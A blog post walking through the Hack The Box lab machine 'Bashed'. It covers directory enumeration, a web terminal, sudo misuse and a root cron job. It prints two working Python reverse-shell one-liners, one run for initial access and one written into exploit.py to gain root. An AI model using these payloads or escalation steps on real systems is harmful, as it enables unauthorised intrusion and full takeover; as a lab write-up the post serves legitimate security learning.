, ,

HTB : Bashed



  • Directory enumeration gives a browser based terminal for initial access.
  • Run a python reverse shell to gain user access in Kali.
  • Running SUDO permission without a password execute the user “scriptmanager” without specifying a password.
  • The /scripts folder runs .py files as a cronjob as root.
  • Create a python file with a reverse shell and root access will be gained.


Run nmap scan to find for open ports.

Port 80 shows us the following.

Nothing interesting

Run a gobuster scan to find for hidden dirrectories.

/dev/ gives us the following.

A browser based linux terminal.

The user arrexel has the user.txt file.


Use a python reverse shell script to spawn a shell in kali.

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("",1235));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

Start a netcat listener .

sudo -l indicates we are able to use sudo on scriptmanager.

Spawn a python shell and and run sudo on scriptmanager.

Find the scripts folder.

There is python script that writes a txt file.

To check if its a cron job , i tried removing the test.txt file but unable to do so. Rename the file and after some time a new test.txt file appears.

This machine seems to run .py files as a cron job and also done by root.

Privilege escalation

Let’s create a new python script with a reverse shell to our machine.

echo 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);' > exploit.py

Root shell is gained.

The final flag is found.

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s

Comments (



%d bloggers like this: